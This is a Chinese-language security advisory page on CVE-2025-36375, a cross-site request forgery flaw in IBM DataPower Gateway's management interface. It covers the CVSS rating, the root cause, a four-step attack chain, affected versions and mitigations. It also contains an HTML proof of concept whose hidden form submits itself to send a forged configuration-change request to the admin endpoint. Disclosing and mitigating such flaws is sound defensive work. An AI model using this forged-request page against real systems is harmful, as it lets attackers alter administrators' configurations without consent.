IPBUF安全漏洞报告
English
CVE-2025-36375 CVSS 6.5 中危

CVE-2025-36375 IBM DataPower Gateway跨站请求伪造漏洞

披露日期: 2026-04-01
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-36375
漏洞类型
跨站请求伪造 (CSRF)
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
IBM DataPower Gateway

相关标签

CSRFIBM DataPower Gateway中危Web安全跨站请求伪造

漏洞概述

IBM DataPower Gateway多个版本存在跨站请求伪造(CSRF)漏洞。由于未充分验证请求来源,攻击者可诱导已认证用户访问恶意页面,从而在用户不知情的情况下以用户身份执行未授权操作。此漏洞主要影响数据完整性,可能导致系统配置被恶意篡改。

技术细节

该漏洞属于CSRF类型,根本原因是IBM DataPower Gateway管理界面在处理状态改变请求时,未对请求头(如Referer)或使用CSRF Token进行严格验证。攻击者可构造包含恶意HTTP请求的HTML页面(如POST表单)。当具有权限的受害者访问该页面时,浏览器会自动携带受害者的Session Cookie发送请求。服务器端误认为请求是受害者本人发起,从而执行攻击者预设的命令。CVSS向量显示攻击无需认证(PR:N),但需要用户交互(UI:R)。

攻击链分析

STEP 1
步骤1:构造恶意页面
攻击者创建包含针对DataPower Gateway管理接口恶意请求的HTML页面。
STEP 2
步骤2:社会工程学诱导
攻击者通过钓鱼邮件等方式诱导已登录的管理员访问恶意页面。
STEP 3
步骤3:发送伪造请求
管理员浏览器加载页面后,自动携带管理员Session Cookie向目标服务器发送请求。
STEP 4
步骤4:执行未授权操作
服务器端接收请求,因缺乏CSRF防护机制,误判为合法操作并执行,导致配置被篡改。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- PoC for CVE-2025-36375: IBM DataPower Gateway CSRF Description: This HTML page attempts to perform a configuration change on the target server by sending a forged POST request when the victim views the page. --> <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://<TARGET_IP>:<PORT>/mgmt/actionqueue/default" method="POST"> <input type="hidden" name="operation" value="modify-config" /> <input type="hidden" name="malicious_setting" value="attacker_controlled_value" /> <input type="submit" value="Click me" /> </form> <script> document.forms[0].submit(); </script> </body> </html>

影响范围

IBM DataPower Gateway 10.5.0.0 through 10.5.0.20
IBM DataPower Gateway 10.6.0.0 through 10.6.0.8
IBM DataPower Gateway 10.6CD 10.6.1.0 through 10.6.5.0

防御指南

临时缓解措施
在应用补丁之前,建议限制DataPower Gateway管理控制台的访问来源IP,仅允许可信的内网或管理主机访问。管理员应避免在浏览其他网站时保持管理会话的登录状态,并在使用后立即登出,以降低被CSRF攻击的风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表